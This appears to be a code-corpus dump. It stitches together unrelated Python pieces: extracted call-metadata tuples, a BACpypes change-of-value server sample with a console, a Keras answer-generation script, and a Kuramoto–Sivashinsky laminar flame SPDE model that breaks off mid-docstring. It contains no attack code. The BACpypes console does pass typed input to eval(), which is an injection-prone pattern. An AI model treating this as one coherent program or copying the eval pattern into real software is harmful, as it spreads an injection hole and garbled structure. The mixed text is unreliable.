| [((162, 189), 'streamlit.subheader', 'st.subheader', (['"""Proportions"""'], {}), "('Proportions')\n", (174, 189), True, 'import streamlit as st\n'), ((194, 237), 'streamlit.sidebar.subheader', 'st.sidebar.subheader', (['"""Proportion Settings"""'], {}), "('Proportion Settings')\n", (214, 237), True, 'import streamlit as st\n'), ((256, 315), 'streamlit.sidebar.radio', 'st.sidebar.radio', (['""""""', "['One Proportion', 'Two Proportions']"], {}), "('', ['One Proportion', 'Two Proportions'])\n", (272, 315), True, 'import streamlit as st\n'), ((378, 391), 'streamlit.columns', 'st.columns', (['(3)'], {}), '(3)\n', (388, 391), True, 'import streamlit as st\n'), ((780, 793), 'streamlit.columns', 'st.columns', (['(1)'], {}), '(1)\n', (790, 793), True, 'import streamlit as st\n'), ((3287, 3300), 'streamlit.columns', 'st.columns', (['(3)'], {}), '(3)\n', (3297, 3300), True, 'import streamlit as st\n'), ((3754, 3767), 'streamlit.columns', 'st.columns', (['(1)'], {}), '(1)\n', (3764, 3767), True, 'import streamlit as st\n'), ((655, 682), 'streamlit.markdown', 'st.markdown', (['"""Pick a test:"""'], {}), "('Pick a test:')\n", (666, 682), True, 'import streamlit as st\n'), ((709, 763), 'streamlit.radio', 'st.radio', (['""""""', "['Left Tail', 'Two Tails', 'Right Tail']"], {}), "('', ['Left Tail', 'Two Tails', 'Right Tail'])\n", (717, 763), True, 'import streamlit as st\n'), ((857, 891), 'math.sqrt', 'math.sqrt', (['(nullp * (1 - nullp) / n)'], {}), '(nullp * (1 - nullp) / n)\n', (866, 891), False, 'import math\n'), ((905, 939), 'math.sqrt', 'math.sqrt', (['(p_hat * (1 - p_hat) / n)'], {}), '(p_hat * (1 - p_hat) / n)\n', (914, 939), False, 'import math\n'), ((986, 1007), 'numpy.arange', 'np.arange', (['(-4)', '(4)', '(0.1)'], {}), '(-4, 4, 0.1)\n', (995, 1007), True, 'import numpy as np\n'), ((1051, 1081), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': x, 'y': y}"], {}), "({'x': x, 'y': y})\n", (1063, 1081), True, 'import pandas as pd\n'), ((2693, 2835), 'pandas.DataFrame', 'pd.DataFrame', (["{'p-Hat': p_hat, 'z-Score': z, 'p-Value': pv, 'CV': rcz, 'Test SD': tsd,\n 'C-Level': cl, 'CI SE': cise, 'ME': rme}"], {'index': '[0]'}), "({'p-Hat': p_hat, 'z-Score': z, 'p-Value': pv, 'CV': rcz,\n 'Test SD': tsd, 'C-Level': cl, 'CI SE': cise, 'ME': rme}, index=[0])\n", (2705, 2835), True, 'import pandas as pd\n'), ((2832, 2846), 'streamlit.write', 'st.write', (['data'], {}), '(data)\n', (2840, 2846), True, 'import streamlit as st\n'), ((3629, 3656), 'streamlit.markdown', 'st.markdown', (['"""Pick a test:"""'], {}), "('Pick a test:')\n", (3640, 3656), True, 'import streamlit as st\n'), ((3683, 3737), 'streamlit.radio', 'st.radio', (['""""""', "['Left Tail', 'Two Tails', 'Right Tail']"], {}), "('', ['Left Tail', 'Two Tails', 'Right Tail'])\n", (3691, 3737), True, 'import streamlit as st\n'), ((4028, 4074), 'math.sqrt', 'math.sqrt', (['(pp_hat * pq_hat * (1 / n1 + 1 / n2))'], {}), '(pp_hat * pq_hat * (1 / n1 + 1 / n2))\n', (4037, 4074), False, 'import math\n'), ((4084, 4138), 'math.sqrt', 'math.sqrt', (['(p_hat1 * q_hat1 / n1 + p_hat2 * q_hat2 / n2)'], {}), '(p_hat1 * q_hat1 / n1 + p_hat2 * q_hat2 / n2)\n', (4093, 4138), False, 'import math\n'), ((4196, 4217), 'numpy.arange', 'np.arange', (['(-4)', '(4)', '(0.1)'], {}), '(-4, 4, 0.1)\n', (4205, 4217), True, 'import numpy as np\n'), ((4261, 4291), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': x, 'y': y}"], {}), "({'x': x, 'y': y})\n", (4273, 4291), True, 'import pandas as pd\n'), ((5915, 6129), 'pandas.DataFrame', 'pd.DataFrame', (["{'p-Hat 1': p_hat1, 'p-Hat 2': p_hat2, 'Pooled p-Hat': pp_hat, 'Diff p-Hat':\n dp_hat, 'z-Score': z, 'p-Value': pv, 'CV': rcz, 'Test SD': tsd,\n 'C-Level': cl, 'CI SE': cise, 'ME': rme}"], {'index': '[0]'}), "({'p-Hat 1': p_hat1, 'p-Hat 2': p_hat2, 'Pooled p-Hat': pp_hat,\n 'Diff p-Hat': dp_hat, 'z-Score': z, 'p-Value': pv, 'CV': rcz, 'Test SD':\n tsd, 'C-Level': cl, 'CI SE': cise, 'ME': rme}, index=[0])\n", (5927, 6129), True, 'import pandas as pd\n'), ((6116, 6130), 'streamlit.write', 'st.write', (['data'], {}), '(data)\n', (6124, 6130), True, 'import streamlit as st\n'), ((429, 454), 'streamlit.text_input', 'st.text_input', (['"""Hits"""', '(20)'], {}), "('Hits', 20)\n", (442, 454), True, 'import streamlit as st\n'), ((475, 501), 'streamlit.text_input', 'st.text_input', (['"""Tries"""', '(25)'], {}), "('Tries', 25)\n", (488, 501), True, 'import streamlit as st\n'), ((545, 572), 'streamlit.text_input', 'st.text_input', (['"""Null:"""', '(0.7)'], {}), "('Null:', 0.7)\n", (558, 572), True, 'import streamlit as st\n'), ((598, 626), 'streamlit.text_input', 'st.text_input', (['"""Alpha"""', '(0.05)'], {}), "('Alpha', 0.05)\n", (611, 626), True, 'import streamlit as st\n'), ((3339, 3366), 'streamlit.text_input', 'st.text_input', (['"""Hits 1"""', '(20)'], {}), "('Hits 1', 20)\n", (3352, 3366), True, 'import streamlit as st\n'), ((3388, 3416), 'streamlit.text_input', 'st.text_input', (['"""Tries 1"""', '(25)'], {}), "('Tries 1', 25)\n", (3401, 3416), True, 'import streamlit as st\n'), ((3468, 3495), 'streamlit.text_input', 'st.text_input', (['"""Hits 2"""', '(30)'], {}), "('Hits 2', 30)\n", (3481, 3495), True, 'import streamlit as st\n'), ((3517, 3545), 'streamlit.text_input', 'st.text_input', (['"""Tries 2"""', '(50)'], {}), "('Tries 2', 50)\n", (3530, 3545), True, 'import streamlit as st\n'), ((3589, 3617), 'streamlit.text_input', 'st.text_input', (['"""Alpha"""', '(0.05)'], {}), "('Alpha', 0.05)\n", (3602, 3617), True, 'import streamlit as st\n')] |
#!/usr/bin/env python
"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""
import time
from threading import Thread
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask
from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# test globals
test_av = None
test_bv = None
test_application = None
#
# SubscribeCOVApplication
#
@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
pass
#
# COVConsoleCmd
#
@bacpypes_debugging
class COVConsoleCmd(ConsoleCmd):
def do_status(self, args):
"""status"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_status %r", args)
global test_application
# dump from the COV detections dict
for obj_ref, cov_detection in test_application.cov_detections.items():
print("{} {}".format(obj_ref.objectIdentifier, obj_ref))
for cov_subscription in cov_detection.cov_subscriptions:
print(" {} proc_id={} confirmed={} lifetime={}".format(
cov_subscription.client_addr,
cov_subscription.proc_id,
cov_subscription.confirmed,
cov_subscription.lifetime,
))
def do_trigger(self, args):
"""trigger object_name"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_trigger %r", args)
global test_application
if not args:
print("object name required")
return
obj = test_application.get_object_name(args[0])
if not obj:
print("no such object")
return
# get the detection algorithm object
cov_detection = test_application.cov_detections.get(obj, None)
if (not cov_detection) or (len(cov_detection.cov_subscriptions) == 0):
print("no subscriptions for that object")
return
# tell it to send out notifications
cov_detection.send_cov_notifications()
def do_set(self, args):
"""set object_name [ . ] property_name [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# change the value
setattr(obj, property_name, value)
except IndexError:
print(COVConsoleCmd.do_set.__doc__)
except Exception as err:
print("exception: %s" % (err,))
def do_write(self, args):
"""write object_name [ . ] property [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# pass it along
obj.WriteProperty(property_name, value)
except IndexError:
print(COVConsoleCmd.do_write.__doc__)
except Exception as err:
print("exception: %s" % (err,))
@bacpypes_debugging
class TestAnalogValueTask(RecurringTask):
"""
An instance of this class is created when '--avtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# make a list of test values
self.test_values = list(float(i * 10) for i in range(10))
def process_task(self):
if _debug: TestAnalogValueTask._debug("process_task")
global test_av
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueTask._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
@bacpypes_debugging
class TestAnalogValueThread(Thread):
"""
An instance of this class is created when '--avthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = list(100.0 + float(i * 10) for i in range(10))
def run(self):
if _debug: TestAnalogValueThread._debug("run")
global test_av
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueThread._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
# sleep
time.sleep(self.interval)
@bacpypes_debugging
class TestBinaryValueTask(RecurringTask):
"""
An instance of this class is created when '--bvtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def process_task(self):
if _debug: TestBinaryValueTask._debug("process_task")
global test_bv
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueTask._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
@bacpypes_debugging
class TestBinaryValueThread(RecurringTask, Thread):
"""
An instance of this class is created when '--bvthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def run(self):
if _debug: TestBinaryValueThread._debug("run")
global test_bv
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueThread._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
# sleep
time.sleep(self.interval)
def main():
global test_av, test_bv, test_application
# make a parser
parser = ConfigArgumentParser(description=__doc__)
parser.add_argument("--console",
action="store_true",
default=False,
help="create a console",
)
# analog value task and thread
parser.add_argument("--avtask", type=float,
help="analog value recurring task",
)
parser.add_argument("--avthread", type=float,
help="analog value thread",
)
# analog value task and thread
parser.add_argument("--bvtask", type=float,
help="binary value recurring task",
)
parser.add_argument("--bvthread", type=float,
help="binary value thread",
)
# provide a different spin value
parser.add_argument("--spin", type=float,
help="spin time",
default=1.0,
)
# parse the command line arguments
args = parser.parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
# make a device object
this_device = LocalDeviceObject(ini=args.ini)
if _debug: _log.debug(" - this_device: %r", this_device)
# make a sample application
test_application = SubscribeCOVApplication(this_device, args.ini.address)
# make an analog value object
test_av = AnalogValueObject(
objectIdentifier=('analogValue', 1),
objectName='av',
presentValue=0.0,
statusFlags=[0, 0, 0, 0],
covIncrement=1.0,
)
_log.debug(" - test_av: %r", test_av)
# add it to the device
test_application.add_object(test_av)
_log.debug(" - object list: %r", this_device.objectList)
# make a binary value object
test_bv = BinaryValueObject(
objectIdentifier=('binaryValue', 1),
objectName='bv',
presentValue='inactive',
statusFlags=[0, 0, 0, 0],
)
_log.debug(" - test_bv: %r", test_bv)
# add it to the device
test_application.add_object(test_bv)
# make a console
if args.console:
test_console = COVConsoleCmd()
_log.debug(" - test_console: %r", test_console)
# enable sleeping will help with threads
enable_sleeping()
# analog value task
if args.avtask:
test_av_task = TestAnalogValueTask(args.avtask)
test_av_task.install_task()
# analog value thread
if args.avthread:
test_av_thread = TestAnalogValueThread(args.avthread)
deferred(test_av_thread.start)
# binary value task
if args.bvtask:
test_bv_task = TestBinaryValueTask(args.bvtask)
test_bv_task.install_task()
# binary value thread
if args.bvthread:
test_bv_thread = TestBinaryValueThread(args.bvthread)
deferred(test_bv_thread.start)
_log.debug("running")
run(args.spin)
_log.debug("fini")
if __name__ == "__main__":
main()
| [
"bacpypes.local.device.LocalDeviceObject",
"threading.Thread.__init__",
"bacpypes.consolelogging.ConfigArgumentParser",
"bacpypes.core.deferred",
"time.sleep",
"bacpypes.core.enable_sleeping",
"bacpypes.object.BinaryValueObject",
"bacpypes.core.run",
"bacpypes.object.AnalogValueObject",
"bacpypes.task.RecurringTask.__init__"
]
| [((10421, 10462), 'bacpypes.consolelogging.ConfigArgumentParser', 'ConfigArgumentParser', ([], {'description': '__doc__'}), '(description=__doc__)\n', (10441, 10462), False, 'from bacpypes.consolelogging import ConfigArgumentParser\n'), ((11416, 11447), 'bacpypes.local.device.LocalDeviceObject', 'LocalDeviceObject', ([], {'ini': 'args.ini'}), '(ini=args.ini)\n', (11433, 11447), False, 'from bacpypes.local.device import LocalDeviceObject\n'), ((11672, 11809), 'bacpypes.object.AnalogValueObject', 'AnalogValueObject', ([], {'objectIdentifier': "('analogValue', 1)", 'objectName': '"""av"""', 'presentValue': '(0.0)', 'statusFlags': '[0, 0, 0, 0]', 'covIncrement': '(1.0)'}), "(objectIdentifier=('analogValue', 1), objectName='av',\n presentValue=0.0, statusFlags=[0, 0, 0, 0], covIncrement=1.0)\n", (11689, 11809), False, 'from bacpypes.object import AnalogValueObject, BinaryValueObject\n'), ((12083, 12209), 'bacpypes.object.BinaryValueObject', 'BinaryValueObject', ([], {'objectIdentifier': "('binaryValue', 1)", 'objectName': '"""bv"""', 'presentValue': '"""inactive"""', 'statusFlags': '[0, 0, 0, 0]'}), "(objectIdentifier=('binaryValue', 1), objectName='bv',\n presentValue='inactive', statusFlags=[0, 0, 0, 0])\n", (12100, 12209), False, 'from bacpypes.object import AnalogValueObject, BinaryValueObject\n'), ((13186, 13200), 'bacpypes.core.run', 'run', (['args.spin'], {}), '(args.spin)\n', (13189, 13200), False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((6623, 6668), 'bacpypes.task.RecurringTask.__init__', 'RecurringTask.__init__', (['self', '(interval * 1000)'], {}), '(self, interval * 1000)\n', (6645, 6668), False, 'from bacpypes.task import RecurringTask\n'), ((7546, 7567), 'threading.Thread.__init__', 'Thread.__init__', (['self'], {}), '(self)\n', (7561, 7567), False, 'from threading import Thread\n'), ((8660, 8705), 'bacpypes.task.RecurringTask.__init__', 'RecurringTask.__init__', (['self', '(interval * 1000)'], {}), '(self, interval * 1000)\n', (8682, 8705), False, 'from bacpypes.task import RecurringTask\n'), ((9635, 9656), 'threading.Thread.__init__', 'Thread.__init__', (['self'], {}), '(self)\n', (9650, 9656), False, 'from threading import Thread\n'), ((12562, 12579), 'bacpypes.core.enable_sleeping', 'enable_sleeping', ([], {}), '()\n', (12577, 12579), False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((12836, 12866), 'bacpypes.core.deferred', 'deferred', (['test_av_thread.start'], {}), '(test_av_thread.start)\n', (12844, 12866), False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((13123, 13153), 'bacpypes.core.deferred', 'deferred', (['test_bv_thread.start'], {}), '(test_bv_thread.start)\n', (13131, 13153), False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((8245, 8270), 'time.sleep', 'time.sleep', (['self.interval'], {}), '(self.interval)\n', (8255, 8270), False, 'import time\n'), ((10301, 10326), 'time.sleep', 'time.sleep', (['self.interval'], {}), '(self.interval)\n', (10311, 10326), False, 'import time\n')] |
#Answer Generation
import csv
import os
import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text
def load_model():
print('\nLoading model...')
# load json and create model
json_file = open('models/MODEL.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
gate_model = model_from_json(loaded_model_json)
# load weights into new model
gate_model.load_weights('models/MODEL.h5', by_name=True)
return gate_model
train_ans, anslist = [], []
def ans_vec():
anslist = []
dataset = ['Train']
for data in dataset:
f = open('data/raw/' + data + '.csv')
lines = csv.reader(f)
for line in lines:
source_uri = line[4]
anslist.append(source_uri)
f.close()
return anslist
def generate_save_ans():
dic = 3
anslist = ans_vec()
gate_model = load_model()
test_title_feature = np.load('data/vectorized/Test_title.npy')
test_summary_feature = np.load('data/vectorized/Test_summary.npy')
tokenizer_a = text.Tokenizer(num_words=dic+1)
tokenizer_a.fit_on_texts(anslist)
dic_a = tokenizer_a.word_index
ind_a ={value:key for key, value in dic_a.items()}
num_test = len(open('data/raw/Test.csv', 'r').readlines())
ans = gate_model.predict([ test_title_feature, test_summary_feature])
fp = open('reports/Test.ans', 'w')
for h in range(num_test):
i = h
if np.argmax(ans[i][0],axis=0) == 0:
fp.write('indiatimes\n') #Low frequency words are replaced with "indiatimes"
else:
for j in range(dic):
an = np.argmax(ans[i][j],axis=0)
if j != dic-1:
anext = np.argmax(ans[i][j+1],axis=0)
if an != 0 and anext != 0: #Words before and after
if an == anext:
fp.write('') #Delete duplicate words
else:
fp.write(ind_a[an] + ' ')
elif an != 0 and anext == 0:
fp.write(ind_a[an])
elif an == 0 and anext != 0:
fp.write(ind_a[anext])
else:
fp.write('')
else:
if an != 0:
fp.write(ind_a[an] + '\n')
else:
fp.write('\n')
fp.close()
def main():
load_model()
print('\n\nGenerating answers...')
if os.path.exists('reports') == False:
os.mkdir('reports')
if os.path.isfile('reports/Test.ans') == False:
generate_save_ans()
print('\nAnswer generation complete...\n\n')
if __name__ == "__main__":
main() | [
"os.path.exists",
"keras.preprocessing.text.Tokenizer",
"numpy.argmax",
"os.path.isfile",
"os.mkdir",
"numpy.load",
"csv.reader"
]
| [((976, 1017), 'numpy.load', 'np.load', (['"""data/vectorized/Test_title.npy"""'], {}), "('data/vectorized/Test_title.npy')\n", (983, 1017), True, 'import numpy as np\n'), ((1045, 1088), 'numpy.load', 'np.load', (['"""data/vectorized/Test_summary.npy"""'], {}), "('data/vectorized/Test_summary.npy')\n", (1052, 1088), True, 'import numpy as np\n'), ((1108, 1141), 'keras.preprocessing.text.Tokenizer', 'text.Tokenizer', ([], {'num_words': '(dic + 1)'}), '(num_words=dic + 1)\n', (1122, 1141), False, 'from keras.preprocessing import text\n'), ((698, 711), 'csv.reader', 'csv.reader', (['f'], {}), '(f)\n', (708, 711), False, 'import csv\n'), ((2606, 2631), 'os.path.exists', 'os.path.exists', (['"""reports"""'], {}), "('reports')\n", (2620, 2631), False, 'import os\n'), ((2650, 2669), 'os.mkdir', 'os.mkdir', (['"""reports"""'], {}), "('reports')\n", (2658, 2669), False, 'import os\n'), ((2678, 2712), 'os.path.isfile', 'os.path.isfile', (['"""reports/Test.ans"""'], {}), "('reports/Test.ans')\n", (2692, 2712), False, 'import os\n'), ((1515, 1543), 'numpy.argmax', 'np.argmax', (['ans[i][0]'], {'axis': '(0)'}), '(ans[i][0], axis=0)\n', (1524, 1543), True, 'import numpy as np\n'), ((1707, 1735), 'numpy.argmax', 'np.argmax', (['ans[i][j]'], {'axis': '(0)'}), '(ans[i][j], axis=0)\n', (1716, 1735), True, 'import numpy as np\n'), ((1794, 1826), 'numpy.argmax', 'np.argmax', (['ans[i][j + 1]'], {'axis': '(0)'}), '(ans[i][j + 1], axis=0)\n', (1803, 1826), True, 'import numpy as np\n')] |
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations.
Acta Astronomica, 4 (1977) pp. 1177–1206.
"""
from typing import Union, Optional, Sequence, Callable
import numpy as np
from dapy.models.base import AbstractDiagonalGaussianModel
from dapy.models.spatial import SpatiallyExtendedModelMixIn
from dapy.integrators.etdrk4 import FourierETDRK4Integrator
from dapy.models.transforms import (
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
fft,
real_array_to_rfft_coeff,
rfft_coeff_to_real_array,
)
class FourierLaminarFlameModel(AbstractDiagonalGaussianModel):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its the Fourier coefficients rather
than values of the state field at the spatial mesh points.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
The governing stochastic partial differential equation (SPDE) is
dX = -(∂⁴X/∂s⁴ + ∂²X/∂s² + X * ∂X/∂s + γ * X) dt + κ ⊛ dW
where `s` is the spatial coordinate in a periodic domain `[0, S)`, `t` the time
coordinate, `X(s, t)` the state field process, `γ` a coefficient controlling the
degree of damping in the dynamics, `W(s, t)` a space-time white noise process,
`κ(s)` a spatial smoothing kernel and `⊛` indicates circular convolution in the
spatial coordinate.
Using a spectral spatial discretisation, this corresponds to a non-linear system of
stochastic differential equations (SDEs) in the Fourier coefficients X̃ₖ
dX̃ₖ = (ωₖ² - ωₖ⁴ - γ) * X̃ₖ + (i * ωₖ / 2) * DFTₖ(IDFT(X̃)²) + κ̃ₖ * dW̃ₖ
where `W̃ₖ` is a complex-valued Wiener process, `κ̃ₖ` the kth Fourier coefficient of
the smoothing kernel `κ`, `ωₖ = 2 * pi * k / S` the kth spatial frequency and `i`
the imaginary unit.
A Fourier-domain exponential time-differencing integrator with 4th order Runge--
Kutta updates for non-linear terms [3, 4] is used to integrate the deterministic
component of the SDE dynamics and an Euler-Maruyama discretisation used for the
Wiener process increment.
The smoothing kernel Fourier coefficients are assumed to be
κ̃ₖ = σ * exp(-ωₖ² * ℓ²) * √(M / S)
where `σ` is a parameter controlling the amplitude and `ℓ` a parameter controlling
the length scale.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations. Acta Astronomica, 4 (1977)
pp. 1177–1206.
3. Kassam, Aly-Khan and Trefethen, <NAME>.
Fourth-order time-stepping for stiff PDEs.
SIAM Journal on Scientific Computing 26.4 (2005): 1214-1233.
4. Cox, <NAME>. and Matthews, <NAME>.
Exponential time differencing for stiff systems.
Journal of Computational Physics 176.2 (2002): 430-455.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
**kwargs
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
assert dim_state % 2 == 0, "State dimension `dim_state` must be even"
self.time_step = time_step
self.observation_space_indices = observation_space_indices
self.observation_function = observation_function
spatial_freqs = np.arange(dim_state // 2 + 1) * 2 * np.pi / domain_extent
spatial_freqs_sq = spatial_freqs ** 2
spatial_freqs[dim_state // 2] = 0
state_noise_kernel = (
(time_step) ** 0.5
* state_noise_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
state_noise_std = rfft_coeff_to_real_array(
state_noise_kernel + 1j * state_noise_kernel, False
)
initial_state_kernel = (
initial_state_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
initial_state_std = rfft_coeff_to_real_array(
initial_state_kernel + 1j * initial_state_kernel, False
)
def linear_operator(freqs, freqs_sq):
return freqs_sq - freqs_sq ** 2 - damping_coeff
def nonlinear_operator(v, freqs, freqs_sq):
return (
-0.5j * freqs * fft.rfft(fft.irfft(v, norm="ortho") ** 2, norm="ortho")
)
self.integrator = FourierETDRK4Integrator(
linear_operator=linear_operator,
nonlinear_operator=nonlinear_operator,
num_mesh_point=dim_state,
domain_size=domain_extent,
time_step=time_step,
num_roots_of_unity=num_roots_of_unity_etdrk4_integrator,
)
if observation_function is None:
dim_observation = np.zeros(dim_state)[observation_space_indices].shape[0]
else:
dim_observation = observation_function(
np.zeros(dim_state)[observation_space_indices], 0
).shape[0]
super().__init__(
dim_state=dim_state,
dim_observation=dim_observation,
initial_state_std=initial_state_std,
initial_state_mean=np.zeros(dim_state),
state_noise_std=state_noise_std,
observation_noise_std=observation_noise_std,
**kwargs
)
def _next_state_mean(self, states: np.ndarray, t: int) -> np.ndarray:
return rfft_coeff_to_real_array(
self.integrator.step(real_array_to_rfft_coeff(states))
)
def _observation_mean(self, states: np.ndarray, t: int) -> np.ndarray:
subsampled_states = fft.irfft(real_array_to_rfft_coeff(states), norm="ortho")[
..., self.observation_space_indices
]
if self.observation_function is None:
return subsampled_states
else:
return self.observation_function(subsampled_states, t)
class SpatialLaminarFlameModel(
SpatiallyExtendedModelMixIn,
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
FourierLaminarFlameModel,
):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its values at the spatial mesh points
rather than the corresponding Fourier coefficients. For more details see the
docstring of `FourierLaminarFlameModel`.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
):
"""
Args:
